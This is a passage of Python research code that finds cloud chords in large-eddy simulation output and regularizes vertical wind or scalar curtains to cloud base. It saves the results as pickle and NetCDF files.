chord_w_per_up = np.vstack([chord_w_per,tmp_w_per_up])
if data_dim_flag==1:
chord_time.append(np.mean(t_1d[ch_idx_l]))
if data_dim_flag==3:
chord_time.append(time_prof[it])
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('iterable: ',it)
print('n_chords: ',n_chords)
print('number of time points included: ',len(cbl_cl_idx))
#Does it matter if I turn these from lists to arrays? Fuck it, will do it anyway
chord_timesteps=np.asarray(chord_timesteps)
chord_duration =np.asarray(chord_duration)
chord_length =np.asarray(chord_length)
chord_height =np.asarray(chord_height)
chord_w_base =np.asarray(chord_w_base)
chord_w_star =np.asarray(chord_w_star)
chord_thl_star =np.asarray(chord_thl_star)
chord_qt_star =np.asarray(chord_qt_star)
chord_w =np.asarray(chord_w)
chord_w_up =np.asarray(chord_w_up)
chord_w_flux =np.asarray(chord_w_flux)
chord_thl =np.asarray(chord_thl)
chord_thl_25 =np.asarray(chord_thl_25)
chord_thl_75 =np.asarray(chord_thl_75)
chord_qt =np.asarray(chord_qt)
chord_qt_25 =np.asarray(chord_qt_25)
chord_qt_75 =np.asarray(chord_qt_75)
chord_time =np.asarray(chord_time)
#Saving
print('all chords: ',len(chord_duration))
save_string_base = 'chord_prop_'+date+'_d'+str(data_dim_flag)+'_ct'+str(chord_times)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_chords)
filename_chord_panda = directory_output+save_string_base+'.pkl'
data_for_panda = list(zip(chord_timesteps,chord_duration,chord_length,chord_height,chord_w_base,chord_w,chord_w_flux,chord_time,chord_w_up,chord_w_per,chord_w_per_up,
chord_w_star,chord_thl_star,chord_qt_star,
chord_thl,chord_thl_25,chord_thl_75,chord_qt,chord_qt_25,chord_qt_75))
df = pd.DataFrame(data = data_for_panda, columns=['timesteps','duration','length','height','w_base','w','w_flux','time','w up','w per','w per up',
'w star','thl star','qt star',
'thl','thl 25','thl 75','qt','qt 25','qt 75'])
df.to_pickle(filename_chord_panda)
time_end = ttiimmee.time()
print('total run time of proc_chords in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print('chordlength properties saved as panda in ',filename_chord_panda)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#If the input data is a 3D field it will always go over x and y directions
#Two different scale_flags added to rotate the curtain to point upwind.
#TODO
#plot_flag disabled for the mean time
def proc_beard_regularize(reg_var = 'w',
date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output = 'data_curtains/',
data_dim_flag=1,
base_smoothing_flag=2,
plot_curtains_flag = 0,
base_percentile = 25,
special_name='',
scale_flag=2,
chord_times = 0,
anomaly_flag = 0,
N_it_max=1e9,
N_it_min=0,
size_bin_flag=0,
N_bins=12,
bin_size = 250,
curtain_extra = 1.0,
chord_max = 1e9,
boundary_scaling_flag = 0
):
# reg_var = variable that will be regularized
# plot_curtains_flag: 0 nothing, 1 plots pre and post regularization plots of reg_var
# data_dim_flag: 1 = column, 3 = 3D snapshot
# time_slice_curtain: 0 only puts out the total sums, 1: adds a seperate output for each time slice, is needed for scale_flag
# scale_flag: If 0, nothing, if 1, it scales the output by u/sqrt(u^2+v^2) and flips the vector if u>0. Is set to 0 if data_dim_flag==1
# 1 the ref_lvl used is determined from the mean cloud base height
# 2, similar to 1 but now using a profile
#
# base_smoothing_flag: 0 use mix of percentile and cloud base as done my Neil, 1: smooth out base after setting it with running average 2: just use percentile defined by base_percentile
# base_percentile: percentile used to find chordlength bottom
# chord_times: 0 use Neils values, use values that fit model output exactly with not gap possible
# anomaly_flag: 0 use reg_var as it is. 1 use reg_var - profile. Works easiest for 3d output, 1d_flag needs to use the closet mean profile
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# size_bin_flag bins the beards by their chord_lenth. Currently using 8 bins of 250 meters length to get started. The lowest bin should be empty, because we only calculate curtains when at least curtain_min is used
# curtain_extra: Regularized chord length before and after in the curtain, default is 1
# chord_max: Maximum number of chords. If data_dim_flag=3 it will jump to the y direction when chord_max/2 is reached
# boundary_scaling_flag: 0 nothing, 1 uses the surface fluxes and cloud base height to calculate either w/w*, thl'/thl*, or qt'/qt*
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #Is recalculated from the profile file later on
dx = 25.0
date = date_str
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 120000
cell_min = 3 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed to convert into a curtain
# #1D clustering parameters,
#set super strict
if chord_times == 1:
t_gap = 0.#No gaps allowed!
t_min = 0
t_max = 1e9
cell_min = 10 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed per curtain
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of minimum z_vlvl of the cbl
#z_min = 0 #Index of minimum z_vlvl of the cbl
#Flag clean up
if data_dim_flag==1:
scale_flag=0
#Creating dictionary to save all properties
settings_dict = {
'reg_var': reg_var,
'date_str':date_str,
'directory_input':directory_input,
'data_dim_flag':data_dim_flag,
'base_smoothing_flag':base_smoothing_flag,
'plot_curtains_flag' :plot_curtains_flag,
'base_percentile':base_percentile,
'special_name':special_name,
'scale_flag':scale_flag,
'chord_times':chord_times,
'anomaly_flag':anomaly_flag,
'N_it_max':N_it_max,
'N_it_min':N_it_min,
'size_bin_flag':size_bin_flag,
'bin_size':bin_size,
'N_bins':N_bins,
'curtain_extra':curtain_extra
}
#moved to an inner function to avoid issues with global and local variables
def func_curtain_reg(input_2d_field):
#function regularizes to cloud base
#2019-03-20: added smoother to hopefully avoid impact of harsch jumps
#2019-03-28: Added simplified version for base_smoothing_flag == 2 which gets rid of 1D pre interpolation
#I originally used interp2d, tried griddata but it was a lot slower
#Calculating the regularized t axis but for original resolution
#It is expected to go a bit beyond -1.5 and 1.5, total width defined by curtain_extra
#takes the original time vector, subtracts it by mean time, then scales it by 1/(time_end_chord-time_beg_chord)
t_reg_orig = t_1d[idx_beg_curtain:idx_end_curtain]-(time_beg_chord+time_end_chord)/2.
t_reg_orig = t_reg_orig/(time_end_chord-time_beg_chord)
#Now we calculate the new regularized grid with the correct vertical but low/original horizontal/time resolution
#mesh_t_low_z_high_x,mesh_t_low_z_high_z = np.meshgrid(t_reg_orig,z_reg_mid) #seems not to be needed
var_t_low_z_high = np.zeros([curtain_cells,n_z_reg])
#introducing z_idx_base vector
#Assigning reference cloud base where no cloud present
z_idx_base=cl_base*1.0+0.0
z_idx_base[:] = z_idx_base_default
for i in range(idx_beg_chord,idx_end_chord):
if i>idx_beg_chord-1 and i<idx_end_chord and cl_base[i]<cbl_1d[i]:
z_idx_base[i] = cl_base[i]
#Here the smoother comes into play:
#We started with a simple 5 cell running mean,
#But now we are making it a function of the chordlength, using a 0.1 running mean
if base_smoothing_flag ==1:
z_idx_base_smooth = z_idx_base*1.0
N = int(np.floor(idx_end_chord-idx_beg_chord)*0.1)
for i in range(idx_beg_chord-N,idx_end_chord+N):
z_idx_base_smooth[i] = sum(z_idx_base[i-N:i+N])/(2*N)
z_idx_base[:] = z_idx_base_smooth[:]
if base_smoothing_flag==2:
#just put the percentile back
z_idx_base[:] = z_idx_base_default
#default version for variable base height
if base_smoothing_flag<2:
#Now for each of the columns of the original curtain a vertical interpolation is done
for i in range(idx_beg_curtain,idx_end_curtain):
#assigining column value
var_orig_col = input_2d_field[:,i]
#Regularizing the z axes so that cloud base is at 1
d_z_tmp = 1.0/z_idx_base[i]
nz = var_orig_col.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#HAve to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_col = np.hstack([var_orig_col[0],var_orig_col])
#1D vertical interpolation to get the right columns and asign them one by one to w_x_low_z_high
#f = interp1d(z_reg_orig, var_orig_col, kind='next')
f = interp1d(z_reg_orig, var_orig_col, kind='nearest')
try:
var_reg_inter = f(z_reg_mid)
except:
print(z_idx_base[i])
print(z_reg_orig)
print(z_reg_mid)
var_t_low_z_high[i-idx_beg_curtain,:] = var_reg_inter
#Now that w_x_low_z_high we have to interpolate 2D onto the rull regularized grid
#print(t_reg_orig.shape,z_reg_mid.shape)
f = interp2d(t_reg_orig, z_reg_mid, var_t_low_z_high.transpose(), kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
#constant base height version
if base_smoothing_flag==2:
#Regularizing the z axes so that cloud base is at 1, since z_idx_base is the same everywhere I just use idx_beg_curtain as one.
i=idx_beg_curtain
d_z_tmp = 1.0/z_idx_base[i]
var_orig_2d = input_2d_field[:,idx_beg_curtain:idx_end_curtain]
nz = var_orig_2d.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_2d = np.vstack([var_orig_2d[0,:],var_orig_2d])
f = interp2d(t_reg_orig, z_reg_orig,var_orig_2d, kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
return var_curtain
#Creating regularized grid.
d_reg = 0.005
n_z_reg = int(1.5/d_reg)
n_t_reg = int((1+2*curtain_extra)/d_reg)
t_reg_bound = np.linspace(-0.5-curtain_extra,0.5+curtain_extra ,n_t_reg+1)
t_reg_mid = np.linspace(-0.5-curtain_extra+d_reg/2,0.5+curtain_extra-d_reg/2 ,n_t_reg)
z_reg_bound = np.linspace(0,1.5 ,n_z_reg+1)
z_reg_mid = np.linspace(0+d_reg/2,1.5-d_reg/2 ,n_z_reg)
mesh_curtain_t,mesh_curtain_z = np.meshgrid(t_reg_mid,z_reg_mid)
var_curtain = np.zeros([n_t_reg,n_z_reg])
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_curtain_up = 0
n_curtain_dw = 0
if size_bin_flag==1:
N_bins = 12
n_curtain_bin = np.zeros([N_bins])
n_curtain_bin_up = np.zeros([N_bins])
n_curtain_bin_dw = np.zeros([N_bins])
var_curtain_bin_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_up_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_dw_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
mid_bin_size = np.linspace(125,-125+N_bins*250,N_bins)
print('mid_bin_size',mid_bin_size)
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
n_chords = 0
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#Setting curtains for var
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_chord = 0
n_curtain_up = 0
n_curtain_dw = 0
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
print('n_curtain: ',n_curtain)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
print('t_1d',t_1d)
#Load the var file, even if means that we doable load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closet mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, V_ref, time_resolution )
print('ref_lvl used to determine reference winds',ref_lvl )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
#Scaling between x and y is calculated here if required. Is skipped if there are less than 2 timesteps, which is what is assigned when no clouds are present
if scale_flag > 0 and t_1d.shape[0]>3:
#calculate the profiles of u and v and their scaling
u_ref_prof = file_prof['u'][it,:]
v_ref_prof = file_prof['v'][it,:]
V_ref_prof = np.sqrt(u_ref_prof**2+v_ref_prof**2)
scaling_factor_x_prof = u_ref_prof/V_ref_prof
scaling_factor_y_prof = v_ref_prof/V_ref_prof
#Using the mean cloud base height as the reference lvl
ref_idx = np.mean(cl_base[cbl_cl_idx])
if scale_flag == 1:
#a new reference level is com
scaling_factor_x = scaling_factor_x_prof[int(ref_idx)]
scaling_factor_y = scaling_factor_y_prof[int(ref_idx)]
print('Scaling flag 1: scaling factor_x: ',scaling_factor_x,' scaling factor_y: ',scaling_factor_y, ' int(ref_idx): ',int(ref_idx))
if scale_flag == 2:
#Regularizing the scaling profiles and interpolation them onto the regularized z axis
d_z_tmp = 1.0/ref_idx
nz = scaling_factor_x_prof.shape[0]
z_reg_orig_top = d_z_tmp*nz-d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#HAve to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
scaling_factor_x_prof_ext = np.hstack([scaling_factor_x_prof[0],scaling_factor_x_prof])
scaling_factor_y_prof_ext = np.hstack([scaling_factor_y_prof[0],scaling_factor_y_prof])
#1D vertical interpolation to get the right columns and asign them one by one to w_x_low_z_high
f_x = interp1d(z_reg_orig, scaling_factor_x_prof_ext, kind='nearest')
f_y = interp1d(z_reg_orig, scaling_factor_y_prof_ext, kind='nearest')
scaling_factor_x_inter = f_x(z_reg_mid)
scaling_factor_y_inter = f_y(z_reg_mid)
print('Scaling flag 2:, mean scaling_factor_x_inter: ',np.mean(scaling_factor_x_inter),
' mean scaling_factor_y_inter: ',np.mean(scaling_factor_y_inter))
### Clustering 1D
#Now we simply go through all cloudy timesteps
#As long as the difference to the next cloudy timestep is lower than t_gap it counts as the same cloud
#As an additional contraint, if the cloudy cells are right next to each other they are always counted as consecutive, not matter the time distance between them.
#if the difference is larger than 20s the cloud is over, and a chordlength is created which is a list of all timesteps that below to that chordlength
#However if the duration of the chordlength is lower than t_min or higher than t_max seconds it isn't
#I added an additional constraint that each chord must include at least cell_min cells, because it is possible to get
#Small chord lengths with more than t_min which are mostly gaps.
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
while t_cloudy_idx < len(cbl_cl_idx)-1 and n_chords<chord_max:
#print('t_chord_begin',t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#print('t_chord_end',t_chord_end)
#Checking if it fulfils chord criteria regaring time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
chord_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
chord_duration = 0
if chord_duration>t_min and chord_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_cloudy_idx]))
#Here we start the interpolation stuff
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#Calculate the beginning and end of the curtain, we add a bit to to each side to make interpolation easy
idx_beg_curtain = (np.abs(t_1d - (time_beg_chord-curtain_extra*(time_end_chord-time_beg_chord)))).argmin()-1
idx_end_curtain = (np.abs(t_1d - (time_end_chord+curtain_extra*(time_end_chord-time_beg_chord)))).argmin()+2
idx_end_curtain = min(idx_end_curtain,nt-1)
time_beg_curtain = t_1d[idx_beg_curtain]
time_end_curtain = t_1d[idx_end_curtain]
chord_cells = t_chord_end-t_chord_begin
curtain_cells = idx_end_curtain-idx_beg_curtain
#If curtain has more than curtain_min cells and curtain tail noes not extend beyond end of 2d field or the beginning extend before
#I added 2 cells buffer at the beginning and end, because for the interpolation a bit of overlap is used.
if idx_end_curtain<nt-2 and idx_beg_curtain>2 and len(cbl_cl_idx[t_chord_begin:t_chord_end])>curtain_min-1:
n_curtain += 1
#First thing to do is calculate the chord base using the 25 percentile in agreement with Neil
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]],base_percentile))
#Regularized curtains, I am too lazy to pass on all my variables to func_curtain_reg so I instead made it a nested function
var_curtain_tmp = (func_curtain_reg(var_2d)).transpose()
if boundary_scaling_flag == 1:
#Now adding the boundary scaling using w*
surf_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
var_curtain_tmp = var_curtain_tmp/boundary_scaling
#Finally add it to the mean one and track one more curtain
#detecting if chord base has a positive or negative w, then adds to the sum of up or downdraft chords
w_tmp = w_2d[cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]]-1,cbl_cl_idx[t_chord_begin:t_chord_end]]
#print(w_tmp)
#Scaling is now added here,
#Things are applied twice so that deviding by n it comes out fin
#We assume here that n_x and n_y are roughly same
#Could be made cleaner later on
if scale_flag>0 and data_dim_flag==3:
if scale_flag==1:
#find out if we need scaling_factor_x or y by seeing if we are in the first or second half
if idx_end_curtain<nt/2:
scaling_factor = 2*scaling_factor_x
else:
scaling_factor = 2*scaling_factor_y
if scaling_factor>0:
var_curtain_tmp = var_curtain_tmp[::-1,:]
var_curtain_tmp = abs(scaling_factor) * var_curtain_tmp
if scale_flag==2:
if idx_end_curtain<nt/2:
scaling_factor_prof = 2*scaling_factor_x_inter
else:
scaling_factor_prof = 2*scaling_factor_y_inter
for n_prof in range(scaling_factor_prof.shape[0]):
if scaling_factor_prof[n_prof]>0:
var_curtain_tmp[:,n_prof] = var_curtain_tmp[::-1,n_prof]
var_curtain_tmp [:,n_prof]= abs(scaling_factor_prof[n_prof])*var_curtain_tmp[:,n_prof]
#Now adding the var_curtain_tmp to the sums
var_curtain_sum = var_curtain_sum+var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_up += 1
var_curtain_up_sum += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_dw += 1
var_curtain_dw_sum += var_curtain_tmp
else:
print('wtf how is this zero: ',np.mean(w_tmp),w_tmp)
#globals().update(locals())
###############################################################################################################################################
################## SIZE BINNING ##############################################################################################################
###############################################################################################################################################
if size_bin_flag:
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
chord_length = ch_duration*V_ref
#if scale_flag==0:
# scaling_factor=1.
#find index of bin close to mid size bin
bin_idx = np.where(np.abs(chord_length-mid_bin_size)<125)[0]
if bin_idx.size>0:
#print('bin_idx,chord_length',bin_idx,chord_length)
n_curtain_bin[bin_idx] += 1
var_curtain_bin_sum[bin_idx,:,:] = var_curtain_bin_sum[bin_idx,:,:] + var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_bin_up[bin_idx] += 1
var_curtain_bin_up_sum[bin_idx,:,:] += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_bin_dw[bin_idx] += 1
var_curtain_bin_dw_sum[bin_idx,:,:] += var_curtain_tmp
else:
print('wtf how is this zero: ',np.mean(w_tmp),w_tmp)
##############################################################################################################################
#PLOTS
##############################################################################################################################
#If the plot flag is set the pre regularization curtains are plotted.
if plot_curtains_flag ==1:
print('plotting not implemented yet')
##############################################################################################################################
#switching to y direction if half of max chords reached
##############################################################################################################################
if n_chords == int(chord_max/2):
t_cloudy_idx = int(len(cbl_cl_idx)/2)
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('curtain processing:',(time3-time2)/60.0,'minutes')
print(':')
print(':')
print(':')
time_end = ttiimmee.time()
print('total run time of proc_beard_regularize in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print(':')
#Replacing saving with xarray
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time'), var_curtain_sum.transpose()/n_curtain),
reg_var+'_up':(('regularized height', 'regularized time'), var_curtain_up_sum.transpose()/n_curtain_up),
reg_var+'_dw':(('regularized height', 'regularized time'), var_curtain_dw_sum.transpose()/n_curtain_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid})
xr_dataset[reg_var].attrs['n']=n_curtain
xr_dataset[reg_var+'_up'].attrs['n']=n_curtain_up
xr_dataset[reg_var+'_dw'].attrs['n']=n_curtain_dw
xr_dataset.attrs = settings_dict
#Making save string
save_string_base = '_beard_'+date+'_d'+str(data_dim_flag)+'_cb'+str(base_smoothing_flag)+'_an'+str(anomaly_flag)+'_ct'+str(chord_times)+'_ce'+str(int(curtain_extra))
if data_dim_flag==3:
save_string_base = save_string_base+'_sf'+str(scale_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_curtain)
save_string = directory_output+ reg_var+save_string_base +'.nc'
xr_dataset.to_netcdf(save_string)
print('saved beard data to '+save_string)
if size_bin_flag==1:
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time','length'), var_curtain_bin_sum.transpose()/n_curtain_bin),
